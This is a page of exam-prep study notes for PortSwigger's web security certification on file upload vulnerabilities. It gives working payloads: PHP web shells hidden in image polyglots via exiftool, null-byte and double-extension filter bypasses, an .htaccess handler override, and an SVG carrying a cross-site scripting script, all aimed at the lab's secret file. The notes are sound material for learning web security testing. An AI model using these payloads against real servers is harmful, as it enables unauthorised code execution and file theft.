bscp notes
  • Resources
  • Exam Hints/Tips
  • Burp dynamic header in Intruder
  • Methodology
  • Payloads
  • Stage 1
    • XSS
    • Information disclosure
    • DOM-based
    • Web Cache Poison
    • Host Headers
    • HTTP Req Smuggling
    • Authentication
  • Stage 2
    • oAuth
    • CSRF
    • Password Reset
    • SQLi
      • SQLi Cheat Sheet
    • JWT
    • Prototype Pollution
    • API Testing - TODO
    • Access Control
    • CORS
  • DATA EXFILTRATION
    • XXE Injections
    • SSRF
    • SSTI
    • Path Traversal
    • File Upload
    • Insecure Desarialization
    • OS Cmd Injection
  • graphql api vulns
  • no sql
  • web cache deception
  • clickjacking
  • websockets
  • web cache deception
Powered by GitBook
On this page
  1. DATA EXFILTRATION

File Upload

  1. Upload the file name and include obfuscated path traversal ..%2fexploit.php and retrieve the content GET /files/avatars/..%2fexploit.php.

  2. Upload a file named, exploit.php%00.jpg with trailing null byte character and get the file execution at /files/avatars/exploit.php.

  3. Create polygot using valid image file, by running the command in bash terminal: exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ./stickman.png -o polyglot2023.php. Once polygot is uploaded, view the extracted data by issuing a GET request to the uploaded path /files/avatars/polyglot.php , and search the response content for the phrase START to obtain the sensitive data.

  4. Upload two different files. First upload .htaccess with Content-Type: text/plain, and the file data value set to AddType application/x-httpd-php .l33t. This will allow the upload and execute of second file upload named, exploit.l33t with extension l33t.

  5. MIME type image/jpeg or image/png is only allowed. Bypass the filter by specifying Content-Type to value of image/jpeg and then uploading exploit.php file.

  6. If target allow Remote File Include (RFI), upload from remote URL, then host and exploit file with the following GIF magic bytes: GIF89a; <?php echo file_get_contents('/home/carlos/secret'); ?>. The file name on exploit server could read image.php%00.gif.

  7. Double file extension bypass filter exploit.csv.php.

File extension bypass:

  1. Extension with varied capitalization, such as .sVG

  2. Double extension, such as .jpg.svg or .svg.jpg

  3. Extension with a delimiter, such as %0a, %09, %0d, %00, #. Other examples, file.png%00.svg or file.png\x0d\x0a.svg

  4. Empty filename, .svg

  5. Try to cut allowed extension with more than the maximum filename length.

XSS when svg upload

Uploading of SVG file that contains JavaScript that performs cross site scripting attack.

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS!");
   </script>
</svg>

PreviousPath TraversalNextInsecure Desarialization

Last updated 5 months ago